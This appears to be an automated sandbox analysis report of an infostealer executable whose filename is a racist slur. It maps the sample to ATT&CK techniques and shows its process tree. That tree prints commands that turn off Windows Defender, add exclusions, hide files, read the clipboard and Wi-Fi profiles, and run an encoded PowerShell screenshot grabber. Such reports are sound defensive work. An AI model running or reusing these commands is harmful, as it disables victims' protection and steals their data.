2c974529f0ba6cf41aca2de5cafee8cd89d080cb41c6e1a4e41302b4c86c6c07

Analysis

max time kernel
4s
max time network
10s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2025 01:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NIGGERSLAVE.exe
Size

7.1MB
MD5

fc811f5134e5a18bae65f1eb6c4bc7e6
SHA1

e21f484b51ab71e67299a12b82c178e85385cf88
SHA256

2c974529f0ba6cf41aca2de5cafee8cd89d080cb41c6e1a4e41302b4c86c6c07
SHA512

eb51a95103f24c6a982a02e03c66b54a9fed91a5d1e2105494d731600bef30b52eb4e04421357c4955c50ef356bc7375a7624608696c38efb53d2802655a695a
SSDEEP

98304:uuCIfhvpj/q12MMD/x/0feyGgatbQ940BDlgwdnpka9R/k9t+2SzIrzUGt+otMew:uHOpj/WSDfyGgqwBdnpkYRMsc81e8yN6

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3532	powershell.exe
1360	powershell.exe
3900	powershell.exe
3376	powershell.exe
4628	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4328	cmd.exe
1736	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe
2896	NIGGERSLAVE.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2280	tasklist.exe
4776	tasklist.exe
3940	tasklist.exe
2388	tasklist.exe
3056	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1392	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4836	cmd.exe
2100	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3236	WMIC.exe
3596	WMIC.exe
2704	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1284	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3376	powershell.exe
3532	powershell.exe
3376	powershell.exe
3532	powershell.exe
4628	powershell.exe
4628	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeSecurityPrivilege	2368	WMIC.exe
Token: SeTakeOwnershipPrivilege	2368	WMIC.exe
Token: SeLoadDriverPrivilege	2368	WMIC.exe
Token: SeSystemProfilePrivilege	2368	WMIC.exe
Token: SeSystemtimePrivilege	2368	WMIC.exe
Token: SeProfSingleProcessPrivilege	2368	WMIC.exe
Token: SeIncBasePriorityPrivilege	2368	WMIC.exe
Token: SeCreatePagefilePrivilege	2368	WMIC.exe
Token: SeBackupPrivilege	2368	WMIC.exe
Token: SeRestorePrivilege	2368	WMIC.exe
Token: SeShutdownPrivilege	2368	WMIC.exe
Token: SeDebugPrivilege	2368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2368	WMIC.exe
Token: SeRemoteShutdownPrivilege	2368	WMIC.exe
Token: SeUndockPrivilege	2368	WMIC.exe
Token: SeManageVolumePrivilege	2368	WMIC.exe
Token: 33	2368	WMIC.exe
Token: 34	2368	WMIC.exe
Token: 35	2368	WMIC.exe
Token: 36	2368	WMIC.exe
Token: SeDebugPrivilege	2280	tasklist.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeSecurityPrivilege	2368	WMIC.exe
Token: SeTakeOwnershipPrivilege	2368	WMIC.exe
Token: SeLoadDriverPrivilege	2368	WMIC.exe
Token: SeSystemProfilePrivilege	2368	WMIC.exe
Token: SeSystemtimePrivilege	2368	WMIC.exe
Token: SeProfSingleProcessPrivilege	2368	WMIC.exe
Token: SeIncBasePriorityPrivilege	2368	WMIC.exe
Token: SeCreatePagefilePrivilege	2368	WMIC.exe
Token: SeBackupPrivilege	2368	WMIC.exe
Token: SeRestorePrivilege	2368	WMIC.exe
Token: SeShutdownPrivilege	2368	WMIC.exe
Token: SeDebugPrivilege	2368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2368	WMIC.exe
Token: SeRemoteShutdownPrivilege	2368	WMIC.exe
Token: SeUndockPrivilege	2368	WMIC.exe
Token: SeManageVolumePrivilege	2368	WMIC.exe
Token: 33	2368	WMIC.exe
Token: 34	2368	WMIC.exe
Token: 35	2368	WMIC.exe
Token: 36	2368	WMIC.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3604 wrote to memory of 2896	3604	NIGGERSLAVE.exe	83
PID 3604 wrote to memory of 2896	3604	NIGGERSLAVE.exe	83
PID 2896 wrote to memory of 2396	2896	NIGGERSLAVE.exe	84
PID 2896 wrote to memory of 2396	2896	NIGGERSLAVE.exe	84
PID 2896 wrote to memory of 2220	2896	NIGGERSLAVE.exe	85
PID 2896 wrote to memory of 2220	2896	NIGGERSLAVE.exe	85
PID 2896 wrote to memory of 3648	2896	NIGGERSLAVE.exe	88
PID 2896 wrote to memory of 3648	2896	NIGGERSLAVE.exe	88
PID 2896 wrote to memory of 4976	2896	NIGGERSLAVE.exe	90
PID 2896 wrote to memory of 4976	2896	NIGGERSLAVE.exe	90
PID 3648 wrote to memory of 2280	3648	cmd.exe	92
PID 3648 wrote to memory of 2280	3648	cmd.exe	92
PID 4976 wrote to memory of 2368	4976	cmd.exe	93
PID 4976 wrote to memory of 2368	4976	cmd.exe	93
PID 2220 wrote to memory of 3532	2220	cmd.exe	94
PID 2220 wrote to memory of 3532	2220	cmd.exe	94
PID 2396 wrote to memory of 3376	2396	cmd.exe	95
PID 2396 wrote to memory of 3376	2396	cmd.exe	95
PID 2896 wrote to memory of 1864	2896	NIGGERSLAVE.exe	97
PID 2896 wrote to memory of 1864	2896	NIGGERSLAVE.exe	97
PID 1864 wrote to memory of 696	1864	cmd.exe	99
PID 1864 wrote to memory of 696	1864	cmd.exe	99
PID 2896 wrote to memory of 1108	2896	NIGGERSLAVE.exe	100
PID 2896 wrote to memory of 1108	2896	NIGGERSLAVE.exe	100
PID 1108 wrote to memory of 1608	1108	cmd.exe	102
PID 1108 wrote to memory of 1608	1108	cmd.exe	102
PID 2896 wrote to memory of 4892	2896	NIGGERSLAVE.exe	103
PID 2896 wrote to memory of 4892	2896	NIGGERSLAVE.exe	103
PID 4892 wrote to memory of 3596	4892	cmd.exe	146
PID 4892 wrote to memory of 3596	4892	cmd.exe	146
PID 2896 wrote to memory of 1504	2896	NIGGERSLAVE.exe	177
PID 2896 wrote to memory of 1504	2896	NIGGERSLAVE.exe	177
PID 1504 wrote to memory of 2704	1504	cmd.exe	108
PID 1504 wrote to memory of 2704	1504	cmd.exe	108
PID 2896 wrote to memory of 1392	2896	NIGGERSLAVE.exe	109
PID 2896 wrote to memory of 1392	2896	NIGGERSLAVE.exe	109
PID 2896 wrote to memory of 3676	2896	NIGGERSLAVE.exe	110
PID 2896 wrote to memory of 3676	2896	NIGGERSLAVE.exe	110
PID 2896 wrote to memory of 1852	2896	NIGGERSLAVE.exe	113
PID 2896 wrote to memory of 1852	2896	NIGGERSLAVE.exe	113
PID 2896 wrote to memory of 4000	2896	NIGGERSLAVE.exe	115
PID 2896 wrote to memory of 4000	2896	NIGGERSLAVE.exe	115
PID 2896 wrote to memory of 4392	2896	NIGGERSLAVE.exe	117
PID 2896 wrote to memory of 4392	2896	NIGGERSLAVE.exe	117
PID 2896 wrote to memory of 4328	2896	NIGGERSLAVE.exe	119
PID 2896 wrote to memory of 4328	2896	NIGGERSLAVE.exe	119
PID 2896 wrote to memory of 4440	2896	NIGGERSLAVE.exe	120
PID 2896 wrote to memory of 4440	2896	NIGGERSLAVE.exe	120
PID 3676 wrote to memory of 4628	3676	cmd.exe	123
PID 3676 wrote to memory of 4628	3676	cmd.exe	123
PID 4392 wrote to memory of 4212	4392	cmd.exe	124
PID 4392 wrote to memory of 4212	4392	cmd.exe	124
PID 1392 wrote to memory of 2984	1392	cmd.exe	125
PID 1392 wrote to memory of 2984	1392	cmd.exe	125
PID 4000 wrote to memory of 4776	4000	cmd.exe	126
PID 4000 wrote to memory of 4776	4000	cmd.exe	126
PID 1852 wrote to memory of 3940	1852	cmd.exe	127
PID 1852 wrote to memory of 3940	1852	cmd.exe	127
PID 2896 wrote to memory of 4648	2896	NIGGERSLAVE.exe	128
PID 2896 wrote to memory of 4648	2896	NIGGERSLAVE.exe	128
PID 2896 wrote to memory of 4836	2896	NIGGERSLAVE.exe	129
PID 2896 wrote to memory of 4836	2896	NIGGERSLAVE.exe	129
PID 2896 wrote to memory of 2856	2896	NIGGERSLAVE.exe	131
PID 2896 wrote to memory of 2856	2896	NIGGERSLAVE.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2984	attrib.exe
4760	attrib.exe
3284	attrib.exe

C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe
"C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3604
- C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe
  "C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1108
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\NIGGERSLAVE.exe"
      4⤵
      Views/modifies file attributes
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4440
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4648
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4836
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2856
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2924
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAA